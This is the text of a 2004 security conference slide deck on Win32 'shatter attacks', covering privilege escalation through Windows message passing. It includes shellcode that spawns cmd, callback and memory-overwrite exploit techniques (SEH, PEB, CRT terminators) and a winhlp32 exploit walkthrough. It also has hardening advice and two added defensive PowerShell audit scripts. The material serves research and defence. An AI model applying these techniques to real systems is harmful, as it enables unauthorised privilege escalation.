Number of slides: 55

Security-Assessment.com
Shoot The Messenger: “win32 Shatter Attacks”
Presented by Brett Moore
Copyright Security-Assessment.com 2004

Corporate Disclaimer
The information included in this presentation is for research and educational purposes only, and is not to be used outside these areas. Exploit code, where used, is included only for example purposes. Security-Assessment.com does not warrant accuracy of information provided, and accepts no liability in any form whatsoever for misuse of this information.

Historically
§ Shatter attacks started out as interesting. Although they were essentially a new class of vulnerability, they were considered more a ‘one off’ novelty than a serious threat
§ MS has had serious security issues in the past: the swiss cheese operating system
§ Highly secure networks were protected with standard security measures
  § Access only for permanent employees with a long job history
  § Thick client model
  § Non-MS workstations with secure builds and secure hardware (no floppy, CD, USB, etc.)

Currently
§ Shatter attacks are starting to widen their scope, but they are still local-to-local privilege escalation
§ MS is starting to get serious about patching: patch management, built-in firewalling, XP SP2 etc. have been forced by customer pressure
§ Highly secure networks now
  § Have contractors all over the place, and employees with a short term job history
  § Employee loyalty is at an all-time low due to the loss of the ‘job for life’ mentality
  § Windows machines are starting to get everywhere as the client machine of choice

What’s To Come
§ Shatter attacks are going to expand. This presentation will demonstrate the direction in which these attacks are heading
§ Windows will be used as a secure platform
§ Highly secure networks will
  § Have contractors all over the place, and employees with a short term job history
  § Employee loyalty at an all-time low due to the loss of the ‘job for life’ mentality
  And
  § Windows machines all over the place that have ‘Secure Builds’ that are trusted to preserve and control access to the network and data, and to control the user’s privileges and actions

The Bottom Line
§ Shatter attacks affect the core of the OS. It is going to take a long time to fix this problem. It may never be fixed, but may be mitigated on a patch-per-case basis
§ It’s not just Microsoft products. All third party services are potentially exploitable. Are the products you buy/sell allowing users to gain elevated privileges?
§ Pay attention. If people don’t pay attention, then in 12 months’ time you are going to be running a ‘secure network’ with ‘locked down builds’ and everything you trust to keep you secure will be rotten at the very core of what you trust

Real World Exploitation
§ Privilege escalation. This is the major impact shatter attacks have. Local, yes, but think Citrix and Remote Desktop. Exploitable by viruses, worms and other malicious code
§ Third party applications: personal firewalls, antivirus applications, monitoring and time tracking systems
§ Any Windows user has access > administrator: install keyloggers, network sniffers and remote access tools; bypass restrictions based on access level; obtain and crack local password files

Consequences Of The Problem
§ Application runs with higher privileges: it may be possible to escalate the user’s privileges
§ Application disables / hides features: it may be possible to obtain unauthorised access
§ Unauthorised application closing: it may be possible to close applications running to monitor usage
§ Target app uses GUI text for SQL queries: it may be possible to exploit classic SQL injection attacks
§ Target app uses GUI text for file access: it may be possible to gain arbitrary file access

Windows Messaging
§ Windows applications wait for input. Input is passed in the form of messages, which are managed by the system and directed to the appropriate windows
§ Window handle. Every window or control has a unique window handle associated with it, which is used as the destination address when passing messages
§ The problem. Currently there is no method to determine the sender of a message, so it is possible for any user to send arbitrary messages to applications

Message Routing
§ Methods
  Posting to the message queue: PostMessage() posts to the queue and returns immediately
  Sending to the window procedure: SendMessage() sends to the WndProc and waits for it to return
§ Message queues
  A single system message queue
  One thread-specific message queue for each GUI thread, created when the thread makes its first call to a GDI function
§ Window procedure
  Every window is created with a window procedure
  It receives and processes all messages sent to the window
  It is shared by all windows belonging to the same class

Message Handling
Diagram: App { PostMessage() } → Thread Message Queue → Message Loop { GetMessage(), TranslateMessage(), DispatchMessage() } → Window Procedure { ActOnMessage() or DefWindowProc() }; App { SendMessage() } → Window Procedure directly

Message Type By Parameter
§ Type 1: used to pass a string to the target app. The data is correctly marshaled, resulting in data transfer to the target application
§ Type 2: used to pass a long to the target app. No marshalling is required and the data is used directly, resulting in the setting of some value in the target application
§ Type 3: used to overwrite memory. A pointer to a structure is passed which is not correctly marshaled, resulting in the overwriting of memory in the target application

Message Marshalling
§ MSDN: “The system only does marshalling for system messages (those in the range 0 to WM_USER). To send other messages (those above WM_USER) to another process, you must do custom marshalling”
§ 0-0x3FF (0..WM_USER-1): system-defined. Defined by Windows, so the operating system understands how to parse the WPARAM and LPARAM parameters and can marshal the messages between processes
§ 0x400-0xFFFF (WM_USER..MAX): user-defined. Since anybody can create a message in this range, the operating system does not know what the parameters mean and cannot perform automatic marshalling

Marshaled Messages
§ < 0x400: automatically marshaled
  winuser.h
    #define WM_USER    0x0400
    #define WM_SETTEXT 0x000C
§ > 0x400: not automatically marshaled
  commctrl.h
    #define HDM_FIRST       0x1200
    #define HDM_GETITEMRECT (HDM_FIRST + 7)
  richedit.h
    #define EM_FINDTEXT     (WM_USER + 56)

Auto Marshaled Data
§ Marshalling is done on a per-message basis. Marshaled messages may be exploitable, dependent on usage. Pointers to pointers are inherently unsafe
§ Parameter is used directly: SendMessage(hWnd, WM_TIMER, 1, (TIMERPROC *)). The (TIMERPROC *) is passed to the WinProc without changing
§ Parameter is a pointer to data: SendMessage(hWnd, WM_SETTEXT, 0, (LPCTSTR)). The data at (LPCTSTR) is copied to the target process mapped heap; the message is processed with an updated (LPCTSTR); the data is copied from target to sender if required

GDI Shared Handle Table
  typedef struct {
      DWORD pKernelInfo;   // 2000/XP, inverted in NT
      WORD  ProcessID;
      WORD  _nCount;
      WORD  nUpper;
      WORD  nType;
      DWORD pUserInfo;
  } GDITableEntry;
Diagram: PEB at 0x7ffdf000; the pointer at 0x7ffdf094 locates the table; the Process Mapped Heap lies at table + 0x60000
§ Holds GDI object handles from all processes
§ 0x4000 GDITableEntry entries

Process Mapped Heap (R/X)
Diagram: Attack App HEAP (mapped) BASE 0x490000, DATA at 0x5238c0; Target App HEAP (mapped) BASE 0x530000, DATA at 0x5c38c0; the static difference of +0xA0000 applies to the base and to the data alike

Shellcode
§ Small. Usually only requires calling system(“cmd”). Can contain null bytes
  BYTE exploit[] = "\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1";
§ Exploiting locally. All relocatable addresses can be assigned at runtime
  hMod = LoadLibrary("msvcrt.dll");
  ProcAddr = (DWORD)GetProcAddress(hMod, "system");
  *(long *)&exploit[8] = ProcAddr;

Passing NULL Bytes
§ SetWindowTextW: a Unicode function, it will accept NULL bytes but is terminated by a wide character NULL
  GOOD  BYTE exploit[] = "\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1";
  GOOD  BYTE exploit[] = "\x68\x63\x6d\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1";
  BAD   BYTE exploit[] = "\x68\x63\x6d\x64\x00\xb9\xc3\xaf\x01\x78\xff\xd1";

Writing NULL Bytes
§ SetWindowTextW: the same address is used if the length is <= the previous length
§ Using multiple messages, write the shellcode backwards
  Successive writes: 0x0303 ("\x03\x03"), then 0x00020000 ("\x00\x02\x00"), then 0x0101 ("\x01\x01")
  Resulting memory at 00511858: 01 01 00 00 02 00 03 03 00 00

Finding Shellcode Address
§ Brute force methods: can automatically handle errors; no good for ‘one shot’ exploits
§ Arbitrary byte writing: allows the writing of bytes to a known location
§ Arbitrary memory reading: statusbar exploit
§ GDI shared heap: Chris Paget, Messagebox / brute force
§ Process mapped heap: SetWindowTextW / ReadProcessMemory

SetWindowTextW / ReadProcessMemory
§ Find heap offset
  Locate the target app mapped heap base:
    ReadProcessMemory(hProcess, 0x7ffdf094, &offset, 4, &bread)
    TargetProcessMappedHeap = offset + 0x060000
  Locate the attack app mapped heap base:
    GdiSharedHandleTable = *(DWORD *)0x7ffdf094
    LocalProcessMappedHeap = GdiSharedHandleTable + 0x060000
  The static heap offset is the difference between the two

SetWindowTextW / ReadProcessMemory
§ Find data address
  Use SetWindowTextW to inject our shellcode
  Search the attack app heap for the shellcode with ReadProcessMemory
  Adjust with the heap offset to obtain the shellcode address in the target
Diagram: Attack App Exploit {SetWindowTextW} → Target App Message Handler → SHELLCODE in target HEAP; Exploit {ReadProcessMemory} over attack app HEAP → {Adjusted Address}

Callback Attacks
§ Pass the address of the shellcode in a message: SendMessage(hWND, WM_MSG, 1, 0xADDRESS)
§ The following accept callbacks as a parameter: WM_TIMER (patched), EM_SETWORDBREAKPROC(EX), LVM_SORTITEMS(EX)
§ The following accept callbacks in a structure: EM_STREAMIN / EM_STREAMOUT, EM_SETHYPHENATEINFO, TVM_SORTCHILDRENCB

Callback Attacks
Diagram: Attack App Exploit {SET TEXT} → Target App HEAP: SHELLCODE; Exploit {CALLBACK} → Target App Message Handler

Callback Attacks
§ Easy shatter (Ovidio Mallo)
  EditWordBreakProcEx(char *pchText, LONG cchText, BYTE bCharSet, INT code); ~ LoadLibrary(LPCTSTR lpLibFileName);
§ Return to libc
  SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpFilter); system(char *command);

EM_STREAMIN Exploit
  struct _editstream {
      DWORD dwCookie;
      DWORD dwError;
      CALLBACK pfnCallback;
  }
  CALLBACK EditStreamCallback(DWORD dwCookie, LPBYTE pbBuff, LONG cb, LONG *pcb); ~ system(char *command);
Editstream exploit structure (hex dump):
  dwCookie     A8 00 31 00   ptr to DATA
  dwError      02 02 .. ..
  pfnCallback  BF 8E 01 78   ptr to system
  DATA         "c:\winnt\system32\cmd.exe"

Arbitrary Memory Writing Attacks
§ Some messages pass a pointer to a structure to receive size data. By passing the address to overwrite, we can write the first member of the structure to a controlled location
§ Paired with a message used to set size data. By using a complementary message to set the size, we can control the first member of the structure
§ This allows the writing of controlled bytes to a controlled location

Writing Arbitrary Bytes (Listview)
Diagram: Attack App Exploit {SET SIZE} → Target App Message Handler; Exploit {REQUEST SIZE} with Address+8 → RECT { LEFT, TOP, RIGHT, BOT } written at the address
  SendMessage(hWnd, LVM_SETCOLUMNWIDTH, 0, BYTE)
  SendMessage(hWnd, HDM_GETITEMRECT, 1, ADDRESS)

Writing Arbitrary Bytes
  For Each Byte To Write {
      SendMessage(hWnd, SET_SIZE_MSG, 0, MAKELPARAM([byte], 0));
      SendMessage(hWnd, GET_SIZE_MSG, 1, [address]);
      address++;
  }
Memory dump (successive snapshots show the string arriving one byte at a time: “H”, “He”, “Hel”, …):
  7FFDF100  48 65 6C 6C 6F 20 57 6F   Hello Wo
  7FFDF108  72 6C 64 ..               rld

Message Pair Examples
§ List view: LVM_SETCOLUMNWIDTH / HDM_GETITEMRECT
§ Tab view: TCM_SETITEMSIZE / TCM_GETITEMRECT
§ Progress bar: PBM_SETRANGE / PBM_GETRANGE
§ Status bar: SB_SETPARTS / SB_GETPARTS
§ Buttons (XP): BCM_SETTEXTMARGIN / BCM_GETTEXTMARGIN

Overwrite SEH
Diagram: Attack App Exploit {SET CODE} → Target App HEAP: SHELLCODE; Exploit {OVERWRITE} → SEH; Exploit {EXCEPTION} → Message Handler; PEB
§ Write shellcode to a known writeable location
§ Overwrite SEH using the byte write
§ Cause an exception

Overwrite PEB Lock Ptr
§ Cannot write byte by byte, as the pointer is used between writes
§ Write shellcode to the heap
§ Set the address to the third byte
§ 0x00 is written to the fourth
HEAP
  00079103  90 B9 20 F0
  00079107  FD 7F B8 03
  0007910B  91 F8 77 89
  0007910F  01 89 41 04
  00079113  90 68 63 6D
  00079117  64 00 54 B9
  0007911B  BF 8E 01 78
  0007911F  FF D1 CC 00
Original 0x7FFDF020: 03 91 F8 77
New      0x7FFDF020: 03 91 07 00

Overwrite PEB Lock Ptr
Diagram: Attack App Exploit {SET CODE} → Target App HEAP: SHELLCODE; Exploit {OVERWRITE} → PEB; Message Handler
§ Write shellcode to the heap
§ Overwrite the PEB using the word write
§ Point into the heap @ 0x00??XXXX

Overwrite GDI Dispatch Table Ptr
§ Cannot write byte by byte, as the pointer is used between writes
§ Write shellcode to a known location
§ Write a pointer table to the heap
§ Set the address to the third byte
§ 0x00 is written to the fourth
Diagram: HEAP holds PTR TO SHELLCODE; PEB; SHELLCODE

Overwrite GDI Dispatch Table Ptr
Diagram: Attack App Exploit {SET CODE} → Target App HEAP: PTR TO SHELLCODE, SHELLCODE; Exploit {OVERWRITE} → PEB; Message Handler
§ Write shellcode to a known writeable location
§ Write a pointer table to the heap
§ Overwrite the GDI pointer using the word write
§ Point into the heap @ 0x00??XXXX

Overwriting C Run-Time Terminators
§ crt0dat.c: C run-time initialization / termination routines
§ Terminators are called from doexit(), which is called on normal or abnormal termination
§ _initterm(_PVFV * pfbegin, _PVFV * pfend): walks a table of function pointers, calling each entry
§ Overwrite a pointer in the table with the address of the shellcode
§ Close the process using a WM_CLOSE message, or by causing an unhandled exception error

Overwriting _initterm Table Entries
exit() → doexit():
  780011F7  push 7803A154h
  780011FC  push 7803A14Ch
  78001201  call 7800119B          ; _initterm
_initterm:
  7800119B  push esi
  7800119C  mov  esi, dword ptr [esp+8]
  780011A0  jmp  780011A5
  780011A2  add  esi, 4
  780011A5  cmp  esi, dword ptr [esp+0Ch]
  780011A9  jae  780011B5
  780011AB  mov  eax, dword ptr [esi]
  780011AD  test eax, eax
  780011AF  je   780011B3
  780011B1  call eax
  780011B3  jmp  780011A2
  780011B5  pop  esi

Buffer Overflows
§ Windows messages pass user input. As with other user-input based security issues, the input should be sanitized before it is used
§ LB_DIR / CB_DIR overflow. In this case the data was marshaled correctly, but the length of the path was not checked before it was used, resulting in a buffer overflow
§ Text length checking. ‘Writing Secure Code’ advises that, to avoid buffer overflows, you should check the length of the requested text before using any of the following messages: TB_GETBUTTONTEXT, LVM_GETISEARCHSTRING, SB_GETTEXT, TVM_GETISEARCHSTRING, TTM_GETTEXT, CB_GETLBTEXT, SB_GETTIPTEXT, LB_GETTEXT. Good advice, but…

Text Retrieval Messages
§ It may not prevent exploitation
  TB_GETBUTTONTEXTA      (WM_USER + 45)
  LVM_GETISEARCHSTRINGA  (LVM_FIRST + 52)
  TVM_GETISEARCHSTRINGA  (TV_FIRST + 23)
  SB_GETTEXTA            (WM_USER + 2)
  SB_GETTIPTEXTA         (WM_USER + 18)
  TTM_GETTEXTA           (WM_USER + 11)
§ Race conditions. This process of requesting the length, setting up a buffer, and then requesting the text could also open up the possibility of race conditions.

Discovery Tools
Locate applications
§ Spy++ (Visual Studio)
§ Task Manager: Windows 2000 can’t close apps running under SYSTEM; Windows XP displays the user applications run under
§ Process Explorer (www.sysinternals.com)
Locate vulnerable messages through fuzzing: enumerate through messages, passing ‘fuzzy’ parameters
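The “locate applications” step above, done with the built-in tools a defender already has rather than Spy++ or Process Explorer. This is an added example, not code from the slides or from Security-Assessment.com; it assumes Windows PowerShell 5.1 or later on a Windows host, run elevated so that `GetOwner()` succeeds for processes belonging to other accounts, and it reports which processes on the current desktop expose a top-level window and which account each runs under.

```powershell
# Added example (not from the slides): audit which processes on the current
# desktop expose a top-level window, and which account each one runs under.
# Assumes Windows PowerShell 5.1 or later, run elevated so that GetOwner()
# succeeds for processes belonging to other accounts.

function Get-WindowedProcess {
    # Map process id -> "DOMAIN\User" using Win32_Process.GetOwner().
    $owners = @{}
    foreach ($proc in Get-CimInstance -ClassName Win32_Process) {
        $result = Invoke-CimMethod -InputObject $proc -MethodName GetOwner
        if ($result.ReturnValue -eq 0) {
            $owners[[int]$proc.ProcessId] = '{0}\{1}' -f $result.Domain, $result.User
        } else {
            $owners[[int]$proc.ProcessId] = '<unknown>'
        }
    }

    # Get-Process reports MainWindowHandle only for windows in the caller's own
    # session, which is exactly the set a message sent from this desktop reaches.
    Get-Process |
        Where-Object { $_.MainWindowHandle -ne [IntPtr]::Zero } |
        ForEach-Object {
            [pscustomobject]@{
                Pid   = $_.Id
                Name  = $_.ProcessName
                Title = $_.MainWindowTitle
                Owner = $owners[[int]$_.Id]
                Path  = $_.Path
            }
        }
}

$windowed = Get-WindowedProcess

# Windows owned by an account other than the logged-on user are the ones to
# review first: a more privileged process accepting messages from this desktop.
$me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$windowed |
    Where-Object { $_.Owner -ne $me } |
    Sort-Object Owner, Name |
    Format-Table Pid, Name, Owner, Title, Path -AutoSize
```

On Windows 2000/XP, the platforms the slides target, services shared the interactive desktop, so SYSTEM-owned entries were common. On Vista and later, session 0 isolation keeps service windows off the user desktop, so an entry owned by SYSTEM or another account in this list is unusual and is worth explaining: it is a process that has chosen to put a window where a lower-privileged session can message it.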

Undocumented Application Messages
§ winhlp32 loaded as SYSTEM
§ Run the fuzzer passing 1
  01016C13  test byte ptr [edi+3], 2
  01016C17  je 01016C2D
§ Point EDI to a block of 0x1111 and continue

Undocumented Application Messages
§ Next exception
  01007E3D  cmp word ptr [esi+20h], di
  01007E41  ja 01007E5D
§ Point ESI to our block of 0x1111, continue
§ Final exception: First-chance exception in winhlp32.exe: 0xC0000005: Access Violation.
  01007EA8  push eax
  01007EA9  call dword ptr [esi+36h]
  01007EAC  inc dword ptr [ebp+8]
  EAX = 0006F198  EBX = 00000002  ECX = 00001402  EDX = 0000…  ESI = 1111…  EDI = 0000…

Undocumented Application Messages
§ Complex callback exploit
§ Send a message passing the address of the pointer 1 block
§ EDI is set to the address of the pointer 1 block
§ ESI is loaded with the address of the pointer 2 block
§ [ESI+36] points to the pointer to the shellcode
Winhlp32.exe exploit structure:
  Pointer 1: block of pointers pointing to pointer 2
  Pointer 2: block of pointers pointing to the shellcode
  Shellcode: code to be executed

Unintentional Functionality
§ Some controls have default message handling: an LB_DIR message sent to utilman reads directories as the SYSTEM user

Unintentional Application Loading
§ HtmlHelp() API: viewer loaded as SYSTEM
§ Common file dialog: Open with cmd.exe
§ Context sensitive help: Winhlp32.exe loaded as SYSTEM

Thick Client Shatter Attacks
§ Request the password for the selected itemdata
§ Attacker changes the selected item
§ Log in the user for the selected itemdata
Diagram: list box with ITEMDATA / TEXT rows 1 Admin, 2 User; the attacker sends {LB_SETCURSEL} to change the selection between the password check and the login

Future Of Windows GUI Attacks
§ Attacks will move away from messages. Attacks will be found that exploit APIs that manipulate window data through other methods.
§ Cross winstation / desktop attacks. There may be loopholes allowing for attacks across these boundaries
§ As long as there are accessible windows, these attacks are not going to be solved overnight. They affect more than just the core Windows OS: every third party application running under the SYSTEM context may be exploitable

Parenting Problems
§ So far unexploitable. An example of a theoretical attack we have so far been unable to exploit in a ‘real world’ situation.
§ SetParent() API. MSDN states: “An application can use the SetParent function to set the parent window of a pop-up, overlapped, or child window. The new parent window and the child window must belong to the same application.”
§ Woops, that’s not quite right. In reality, any application can set the parent of any window created by any other application.

Parenting Problems Theory
§ The exploit becomes the parent
§ The target app calls GetParent() to obtain a handle to the parent window
§ The target requests data from the parent window
§ The exploit supplies corrupt data, leading to exploitation

Windows Properties
§ What are properties. Window properties are used to store data associated with a window. They can store any type of information and are application specific
§ The functions. GetProp() retrieves the data from a property of the specified hWnd. SetProp() sets the data of a property of the specified hWnd
§ The problem. Any application can set any property value of any other window
§ No ‘core services’ vulnerable. We have been unable to exploit any of the default Windows services. But…

Windows Properties
§ AfxOldWndProc423. MFC subclasses all non-MFC derived windows to handle specific activation issues. While subclassing a non-MFC created window, the old window procedure is stored in the properties of the window.
§ WindowProc in a property. This address is chained through the subclassed window proc and can be overwritten, allowing for execution flow control
The first third party application tested was vulnerable

Application Protection Thoughts
§ Message filtering. There are too many known and unknown messages to block the dangerous ones. Only allowing the safe messages can be very tricky to implement throughout an application, and how can you be sure they are safe? As we have shown, it is not just message handlers that are vulnerable
§ Limited privilege. Windows should not be created with higher privileges. Beware RevertToSelf() exploitation
§ Application defined messages. Ensure any messages you define are handled safely. As with any type of user input, data should be validated first

Application Protection Thoughts
§ The service should talk to the GUI using RPC, sockets, named pipes, or COM for communication from the service to the GUI
§ Disable interactive services: HKLM\SYSTEM\CurrentControlSet\Control\Windows\NoInteractiveServices. Defaults to zero, allowing services with SERVICE_INTERACTIVE_PROCESS to run interactively. When set to a nonzero value, no service started thereafter is allowed to run interactively, regardless of SERVICE_INTERACTIVE_PROCESS
§ Understanding the threat. Hopefully this presentation has helped you do just that
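A check for the “disable interactive services” item above, written as an added example that is not part of the slides or of Security-Assessment.com’s material. It assumes Windows PowerShell 5.1 or later on a Windows host; reading the registry needs no elevation, setting the value does. It reads the NoInteractiveServices value named on the slide and lists every service whose Type DWORD carries the SERVICE_INTERACTIVE_PROCESS bit (0x100), together with the account it is registered to run under, so the services that would put a window on the interactive desktop can be reviewed one by one.

```powershell
# Added example (not from the slides): check the NoInteractiveServices setting
# and list services registered with the SERVICE_INTERACTIVE_PROCESS type bit.
# Assumes Windows PowerShell 5.1 or later; setting the value needs elevation.

$SERVICE_INTERACTIVE_PROCESS = 0x100   # bit in a service's Type DWORD

function Get-NoInteractiveServices {
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Windows'
    $item = Get-ItemProperty -Path $key -Name NoInteractiveServices -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }    # value missing behaves like zero (interactive allowed)
    return [int]$item.NoInteractiveServices
}

function Get-InteractiveService {
    # Each service's Type lives under HKLM\SYSTEM\CurrentControlSet\Services\<name>.
    Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' | ForEach-Object {
        $svc = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        if ($null -eq $svc) { return }                       # key not readable, skip it
        $type = $svc.PSObject.Properties['Type']
        if ($null -eq $type) { return }                      # no Type value, not a service entry
        if (([int]$type.Value -band $SERVICE_INTERACTIVE_PROCESS) -eq 0) { return }

        # A Win32 service with no ObjectName value runs as LocalSystem.
        $account = 'LocalSystem'
        if ($svc.PSObject.Properties['ObjectName']) { $account = $svc.ObjectName }

        [pscustomobject]@{
            Name      = $_.PSChildName
            Type      = '0x{0:X}' -f [int]$type.Value
            Account   = $account
            ImagePath = $svc.ImagePath
        }
    }
}

$flag = Get-NoInteractiveServices
if ($flag -eq 0) {
    Write-Warning "NoInteractiveServices = $flag : SERVICE_INTERACTIVE_PROCESS services may still put windows on the interactive desktop."
} else {
    Write-Output "NoInteractiveServices = $flag : services started from now on cannot run interactively."
}

Get-InteractiveService | Sort-Object Name | Format-Table -AutoSize

# Hardening as the slide describes (run elevated; applies to services started afterwards):
# Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Windows' -Name NoInteractiveServices -Value 1 -Type DWord
```

The list is more useful than the flag alone: the value only affects services started after it is set, so a service that is already running interactively stays reachable until it is restarted, and a third party service that still carries the interactive bit is a candidate for the RPC, socket, named pipe or COM split the slide recommends.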

Some History
2000-07  DilDog: Windows Still Image Privilege Elevation
2000-08  Justin E. Forrester and team: An Empirical Study of the Robustness of NT Applications Using Random Testing
2002-05  Simeon Xenitellis: Security Vulnerabilities In Event-Driven Systems
2002-05  Chris Paget: Shatter Attacks - How to break Windows
2002-07  Simeon Xenitellis: Security Vulnerabilities In Event-Driven Systems (revised)
2002-08  Chris Paget: More on Shatter
2002-12  Microsoft Security Bulletin MS02-071 (WM_TIMER)
2003-07  Oliver Lavery: Win32 Message Vulnerabilities Redux
2003-07  Microsoft Security Bulletin MS03-025 (LVM_SortItems workaround)
2003-10  Brett Moore: Shattering By Example
2003-10  Microsoft Security Bulletin MS03-045 (LB_DIR / CB_DIR)
2004     Microsoft Security Bulletin MS04-011 (Utility Manager Winhlp32 Priv Escalation)
2004-07  Microsoft Security Bulletin MS04-019 (Utility Manager Winhlp32 Priv Escalation #2)